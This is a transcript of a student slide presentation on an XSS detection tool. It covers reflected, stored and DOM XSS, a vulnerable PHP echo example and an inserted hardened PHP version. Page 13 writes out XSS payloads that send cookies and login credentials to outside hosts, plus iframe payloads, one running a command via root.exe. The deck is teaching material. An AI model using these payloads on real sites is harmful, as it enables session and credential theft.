XSS-Alert-Penetration testing tool

Cross-Site Scripting (XSS) attack detection for web applications http://sourceforge.net/projects/xssalert7/ Author: Arjun Jain (07104701), Department of Computer Science and Information Technology, Jaypee Institute of Information Technology, Sector-62, Noida, Uttar Pradesh

description

This presentation describes how the XSS alert tool works.

Transcript of XSS-Alert-Penetration testing tool

Page 1: XSS-Alert-Penetration testing tool

Cross-Site Scripting (XSS) attack detection for web applications

http://sourceforge.net/projects/xssalert7/

Author: Arjun Jain (07104701), Department of Computer Science and Information Technology

Jaypee Institute of Information Technology, Sector-62, Noida, Uttar Pradesh

Page 2: XSS-Alert-Penetration testing tool

Agenda

Overview of XSS attack

Types of XSS attack

Example

Limitations of the attack

DOM security overview

XSS alert working model

Demo

Page 3: XSS-Alert-Penetration testing tool

What is Cross-Site Scripting (XSS)

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by others.

Types:

1: Reflected XSS

2: Stored XSS

3: DOM based XSS

Page 4: XSS-Alert-Penetration testing tool

Ranked #1 in OWASP 2007 top 10

Ranked #2 in OWASP 2010 top 10

7 out of 10 sites have XSS (Jeremiah Grossman, WhiteHat website security statistics report, Oct 2007)

Page 5: XSS-Alert-Penetration testing tool

Reflected XSS

It refers to all non-persistent XSS issues, which occur when a web application blindly echoes parts of the HTTP request in the corresponding HTTP response HTML.

Example:

<?php
// Vulnerable: the request parameter is written into the page unencoded
$name = $_GET['name'];
echo "Hey" . $name;
?>

$name may contain JavaScript.
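A hardened counterpart to the slide's PHP snippet, added here as an example and not taken from the presentation or the XSS alert tool. The function names, the $samples requests and the input field are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Encode untrusted text for an HTML text node or a quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// The slide's pattern: the request value is concatenated into HTML unchanged.
function greet_vulnerable(array $query): string
{
    return 'Hey ' . ($query['name'] ?? '');
}

// Hardened: accept only a string (name[]=x arrives as an array) and encode
// at the point of output, so markup characters become inert entities.
function greet_hardened(array $query): string
{
    $name = $query['name'] ?? '';
    return 'Hey ' . h(is_string($name) ? $name : '');
}

// The same value reflected inside a quoted attribute: ENT_QUOTES matters here,
// because an unencoded " would close the attribute and start new markup.
function name_field_hardened(array $query): string
{
    $name = $query['name'] ?? '';
    return '<input name="name" value="' . h(is_string($name) ? $name : '') . '">';
}

// Constructed sample requests (stand-ins for $_GET); harmless markup only.
$samples = [
    ['name' => 'Alice'],
    ['name' => '"><b>injected</b>'],
    ['name' => ['unexpected', 'array']],
];

foreach ($samples as $query) {
    if (is_string($query['name'])) {
        echo 'vulnerable: ', greet_vulnerable($query), PHP_EOL;
    }
    echo 'hardened:   ', greet_hardened($query), PHP_EOL;
    echo 'attribute:  ', name_field_hardened($query), PHP_EOL;
}
```

Run it with the PHP command-line interpreter; for the second sample the vulnerable line contains live markup, while the hardened and attribute lines contain only entities.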

Page 6: XSS-Alert-Penetration testing tool

Stored XSS

It refers to all XSS vulnerabilities where the adversary is able to permanently inject the malicious script into the vulnerable application's storage. The result is that every user who accesses the poisoned web page receives the injected script without further action by the adversary.

Page 7: XSS-Alert-Penetration testing tool

DOM-based XSS

It is a special variant of reflected XSS, where logic errors in legitimate JavaScript and careless usage of client-side data result in XSS conditions.

Page 8: XSS-Alert-Penetration testing tool

Example

Page 9: XSS-Alert-Penetration testing tool

Unvalidated input with XSS

Page 10: XSS-Alert-Penetration testing tool

Unvalidated input with XSS

Page 11: XSS-Alert-Penetration testing tool

Unvalidated input in XSS

Page 12: XSS-Alert-Penetration testing tool

Unvalidated input in XSS

Unvalidated input resulted in a cross-site scripting attack and the theft of the administrator’s cookies.

Page 13: XSS-Alert-Penetration testing tool

Types of information leakage

Client can reveal cookies to a 3rd party (session state, order info, etc.)

http://host/a.php?variable="><script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'%20+document.cookie</script >

Client can reveal posted form items to a 3rd party (userID/passwd, etc.)

<form> action="logoninformation.jsp" method="post" onsubmit="hackImg=new Image; hackImg.src='http://www.malicioussite.com/'+document.forms(1).login.value'+':'+ document.forms(1).password.value;" </form>

Client can be tricked into accessing/posting spoofed info to a trusted server

www.trustedserver.com/xss.asp?name = <iframe http://www.trustedserver.com/auth_area/orderupdate?items=4000 > </iframe>

Client can be tricked into attacking other sites

/hello.asp?name = <iframe src= http://vuln.iis.server/scripts/root.exe?/c+dir ></iframe>

Page 14: XSS-Alert-Penetration testing tool

Limitations of these attacks

Usually only get one transaction with XSS code against the vulnerable site

Most attacks are only focused on collecting cookies

POST-based forms are seldom leveraged; attacks almost always use GET methods

Attacker does not know the actual responses to the client

Some experts recommend using POST, hidden form inputs and other session state info to limit XSS risks.

Page 15: XSS-Alert-Penetration testing tool

DOM Security Overview

Child windows and same-site trust

Scripts can interact between the two windows

Script content can be loaded from anywhere (RPC/remote scripting is common)

Images can be loaded from anywhere

JavaScript can either be within <script></script> tags, loaded from elsewhere via <script src=remote.com>, or attached to many tags

<img src=javascriptn load=javascript>

Form GET/POST can be to another site or a JavaScript action

XSS allows DOM abuse, but still follows DOM rules

Page 16: XSS-Alert-Penetration testing tool

XSS alert working model

Page 17: XSS-Alert-Penetration testing tool

Page 18: XSS-Alert-Penetration testing tool

Demo

Page 19: XSS-Alert-Penetration testing tool

Attack on Yahoo server with GET string

“?q=”

Page 20: XSS-Alert-Penetration testing tool

Final Result

Page 21: XSS-Alert-Penetration testing tool

Thank you!